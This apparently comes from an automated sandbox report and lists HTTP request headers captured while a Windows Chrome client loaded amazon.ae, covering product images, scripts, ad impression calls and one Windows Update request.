    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07yk48157_379x304_ae-en._SY116_CB623005781_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07fsr5k7g_379x304_ae-en._SY116_CB623005785_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/411x8BHUrFL._RC%7C71xP0umV4JL.js,01gK5H1EnXL.js,01phmzCOwJL.js,01eOvPdxG7L.js,71xgcL-oXCL.js,41jBieyCvYL.js,01wXnKULArL.js,01+pnQJuQ0L.js,21fcR05bSUL.js,41rnk3z1gYL.js,51H8vCDt+dL.js,31J-NEfNY0L.js,11lEMI5MhIL.js,31+UifI0MIL.js,71-pKfDl0GL.js,41aCLC6fiuL.js,01VYGE8lGhL.js_.js?AUIClients/NavDesktopUberAsset&4c3EyOfv HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81K5-xh1dIL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcar_b07pcm7ds2_379x304_ae-en._SY116_CB623005780_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1741561_3919943_379x304_1X_en_AE._SY304_CB566685890_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/710sizyJOdL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/613LeHTw6yL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71ApD6of+QL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71kMkDkj2LL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61xk7AMMIYL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51gIRpQKHHL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ii/1722546138571/inner.html HTTP/1.1Host: d1lxz4vuik53pc.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+GmgovDSPBzpvFk&MD=gD7TEatm HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /images/I/718HNI21EeL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81OdMnlnPlL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07s96bn4y_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/113mXmMm69L.css?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07ns817nh_379x304_ae-en._SY116_CB623271885_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11+d9I1l9AL.js?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07nsb535l_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71R7KNGuPAL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61aLnSfQfJL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b077n51cr2_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/xsp/imp?b=RPrmAvHFWszG-tGSlwHHbCQAAAGRdjLjogMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICBStrp9&pj=%7B%22measurementMethod%22%3A%22btr_client%22%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/px/RPrmAvHFWszG-tGSlwHHbCQAAAGRdjLjogMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICBStrp9/atf/%7B%22atf%22:false%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71xqZsKXk-L._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71iAQfFKjAL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259740_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/91fwcCc9bVL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61Mmgk68miL._AC_UL640_QL65_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81yOsv2Uv5L._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61714TRvg4L._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71xQ06a-1ZL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/711nRqFo6GL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11oFnIMXIiL.css?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/xsp/getAdj?placementId=a41eaf9d-2a3a-4755-9b85-43dc8c32cac2&src=518&rj=%7B%7D&slot=auto-left-advertising-1&rid=0101303bdabc4c01cc6316b4cb39fd37d0ef69e5c99e4e3dad870bf325de8a77398b&callback=aax_xsp_render_ad HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11B2bsTfmvL._RC%7C61xJcNKKLXL.js,11Y+5x+kkTL.js,51XFQXG4llL.js,11yKORv-GTL.js,11GgN1+C7hL.js,01+z+uIeJ-L.js,01VRMV3FBdL.js,21BJeD9yjcL.js,01meRT+S4PL.js,11aD5q6kNBL.js,11rRjDLdAVL.js,51LGf0aHP5L.js,11nAhXzgUmL.js,11UNP9ncXuL.js,113pYUOav3L.js,11uo7qXoO3L.js,01VhK3jZdbL.js,21eKR4hvwNL.js,01Q4S7ptbiL.js,51XuQjpKb8L.js,01JYHc2oIlL.js,31nfKXylf6L.js,01ktRCtOqKL.js,21xlsLy-PNL.js,11bEz2VIYrL.js,31o2NGTXThL.js,01rpauTep4L.js,315n+VmgJ3L.js,01tvglXfQOL.js,11jxZ9ouCoL.js,01fBsnBQx0L.js_.js?AUIClients/AmazonUI&88n9Ttiw HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259756_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259758_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61P7PbkOUpL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259749_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b09774kt11_379x304_ae-en._SY116_CB623005781_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
